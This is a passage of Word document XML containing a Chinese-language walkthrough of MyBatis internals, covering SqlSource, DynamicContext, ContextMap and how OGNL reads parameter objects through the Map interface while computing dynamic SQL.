          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>SqlSource接口只有一个getBoundSql(Object parameterObject)方法，返回一个BoundSql对象。一个BoundSql对象，代表了一次sql语句的实际执行，而SqlSource对象的责任，就是根据传入的参数对象，动态计算出这个BoundSql，也就是说Mapper文件中的&lt;if /&gt;节点的计算，是由SqlSource对象完成的。SqlSource最常用的实现类是DynamicSqlSource，来看一看它的代码：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="11145" w:type="dxa"/>
        <w:tblCellSpacing w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="480"/>
        <w:gridCol w:w="10665"/>
      </w:tblGrid>
      <w:tr w:rsidR="00944ED8" w:rsidRPr="00F526FE" w:rsidTr="008232D6">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00944ED8" w:rsidRPr="00F526FE" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
            <w:pPr>
              <w:spacing w:line="231" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10665" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00944ED8" w:rsidRPr="00F526FE" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
            <w:pPr>
              <w:spacing w:line="231" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F526FE">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>rootSqlNode.apply(context);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00F526FE" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="150" w:after="150" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F526FE">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这句调用语句，启动了一个非常精密的递归实现的动态计算</w:t>
      </w:r>
      <w:r w:rsidRPr="00F526FE">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidRPr="00F526FE">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>语句的过程，计算过程使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F526FE">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Ognl</w:t>
      </w:r>
      <w:r w:rsidRPr="00F526FE">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>来根据传入的参数对象计算表达式，生成该次调用过程中实际执行的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F526FE">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidRPr="00F526FE">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>语句。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00F526FE" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3.org.apache.ibatis.scripting.xmltags.DynamicContext</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DynamicContext类中，有对传入的parameterObject对象进行“map”化处理的部分，也就是说，你传入的pojo对象，会被当作一个键值对数据来源来进行处理，读取这个pojo对象的接口，还是Map对象。从DynamicContext的源码中，能看到很明显的线索。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>DynamicContext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>的构造函数中，可以看到，根据传入的参数对象是否为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>类型，有两个不同构造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>ContextMap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>的方式。而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>ContextMap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>作为一个继承了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>的对象，作用就是用于统一参数的访问方式：用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>接口方法来访问数据。具体来说，当传入的参数对象不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>类型时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>Mybatis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>会将传入的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>POJO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>对象用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>MetaObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>对象来封装，当动态计算</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>过程需要获取数据时，用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>接口的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>方法包装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>MetaObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>对象的取值过程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我们都知道，Mybatis中采用了Ognl来计算动态sql语句，DynamicContext类中的这个静态初始块，很好的说明了这一点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00DA54D7" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:line="198" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId233" w:history="1">
        <w:r w:rsidR="00944ED8">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:color w:val="005FA9"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>?</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="11145" w:type="dxa"/>
        <w:tblCellSpacing w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="480"/>
        <w:gridCol w:w="10665"/>
      </w:tblGrid>
      <w:tr w:rsidR="00944ED8" w:rsidTr="008232D6">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
            <w:pPr>
              <w:spacing w:line="231" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
            <w:pPr>
              <w:spacing w:line="231" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
            <w:pPr>
              <w:spacing w:line="231" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10665" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
            <w:pPr>
              <w:spacing w:line="231" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
              </w:rPr>
              <w:t>static</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
            <w:pPr>
              <w:spacing w:line="231" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
              </w:rPr>
              <w:t>  OgnlRuntime.setPropertyAccessor(ContextMap.class,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
              </w:rPr>
              <w:t>ContextAccessor());</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
            <w:pPr>
              <w:spacing w:line="231" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ContextAccessor也是DynamicContext的内部类，实现了Ognl中的PropertyAccessor接口，为Ognl提供了如何使用ContextMap参数对象的说明，这个类也为整个参数对象“map”化划上了最后一笔。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>现在我们能比较清晰的描述一下Mybatis中的参数传递和使用过程了：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="E53333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将传入的参数对象统一封装为ContextMap对象（继承了HashMap对象），然后Ognl运行时环境在动态计算sql语句时，会按照ContextAccessor中描述的Map接口的方式来访问和读取ContextMap对象，获取计算过程中需要的参数。ContextMap对象内部可能封装了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="E53333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>普通的POJO对象，也可以是直接传递的Map对象，当然从外部是看不出来的，因为都是使用Map的接口来读取数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00861465" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6173697" cy="4495800"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="227" name="图片 1" descr="C:\Users\Administrator\AppData\Roaming\Tencent\Users\407345725\QQ\WinTemp\RichOle\2[P4}UUVWV_V3X3~$~V)R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AppData\Roaming\Tencent\Users\407345725\QQ\WinTemp\RichOle\2[P4}UUVWV_V3X3~$~V)R_5.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId234" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6173697" cy="4495800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
